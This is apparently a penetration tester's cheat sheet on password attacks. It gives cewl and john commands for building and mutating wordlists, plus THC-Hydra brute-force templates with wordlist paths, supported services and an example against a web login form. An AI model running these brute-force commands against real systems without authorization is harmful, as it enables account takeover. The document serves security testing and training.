Password Attacks
Brute force and Wordlists
HINT
Try default credentials first: ihebski/DefaultCreds-cheat-sheet
If that doesn’t work try to obvious ones first (like, root, toor, password or the service name)
If that also doesn’t work try already harvested credentials from the environment.
Create a custom wordlist
- Scrape the words:
cewl --depth 5 --min_word_length 5 --write passwords.txt --ua "curl/7.83.0" --with-numbers -v {URL} - Mutate them:
john --wordlist=passwords.txt --rules --stdout > mutated.txt
THC-Hydra
HINT
If you use a long password list, you can prepend
timeout 30m hydra...to stop the attack after 30 minutes
hydra -v -V -u -t 4 {TWO_OF_THE_BELLOW_OPTIONS_EXCEPT_WITH_OPTION_C} -u {IP} -s {PORT} {SERVICE}-l {USERNAME}-p {PASSWORD}-L {USERNAME_LIST}/usr/share/seclists/Usernames/top-usernames-shortlist.txt/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
-P {PASSWORD_LIST}/usr/share/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt/usr/share/seclists/Passwords/Common-Credentials/best1050.txt/usr/share/john/password.lst/usr/share/wordlists/rockyou.txt/usr/share/seclists/Passwords/xato-net-10-million-passwords.txt- Or generate your own password list with
cewl
-C {COLON_SEPERATED_CREDENTIALS_LIST}/usr/share/seclists/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt
- Supported services:
adam6500 asterisk cisco cisco-enable cobaltstrike cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
Example usage for http forms:
hydra -v -V -u -t 4 -L {USERNAME_LIST} -P {PASSWORD_LIST} {IP} http-post-form "/login.asp:username=^USER^&password=^PASS^&submit=Enter:Login failed!"Relevant Note(s): Crack the Hashes